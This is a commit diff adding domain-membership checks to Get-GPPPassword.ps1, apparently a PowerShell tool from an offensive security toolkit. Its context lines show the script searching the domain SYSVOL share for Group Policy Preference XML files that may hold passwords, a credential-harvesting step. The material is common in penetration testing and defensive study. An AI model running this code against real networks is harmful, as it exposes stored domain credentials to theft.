Terminating Errors Added

obscuresec · obscuresec · commit eb85e1ce9d74 · 2013-07-03T20:31:53.000-04:00
Added checks to ensure that the script is being ran on a domain-joined machine and with a domain account.
diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1
@@ -60,6 +60,10 @@
         catch {Write-Error "$Error[0]"}
     }  
     
+    #ensure that machine is domain joined and script is running as a domain account
+    if (((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False) {throw 'Machine is not joined to a domain.'}
+    if (($Env:USERDNSDOMAIN) -eq $Null) {throw 'Account is not a domain account.'}
+    
     #discover potential files containing passwords
     $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -Include 'groups.xml','services.xml','scheduledtasks.xml','datasources.xml'
     
@@ -123,4 +127,4 @@
         
         catch {Write-Error $Error[0]}  
     }
-}
+}

Original file line number	Diff line number	Diff line change
`@@ -60,6 +60,10 @@`
`60`	`60`	`catch {Write-Error "$Error[0]"}`
`61`	`61`	`}`
`62`	`62`
	`63`	`+ #ensure that machine is domain joined and script is running as a domain account`
	`64`	`+ if (((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False) {throw 'Machine is not joined to a domain.'}`
	`65`	`+ if (($Env:USERDNSDOMAIN) -eq $Null) {throw 'Account is not a domain account.'}`
	`66`	`+`
`63`	`67`	`#discover potential files containing passwords`
`64`	`68`	`$XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -Include 'groups.xml','services.xml','scheduledtasks.xml','datasources.xml'`
`65`	`69`
`@@ -123,4 +127,4 @@`
`123`	`127`
`124`	`128`	`catch {Write-Error $Error[0]}`
`125`	`129`	`}`
`126`		`-}`
	`130`	`+}`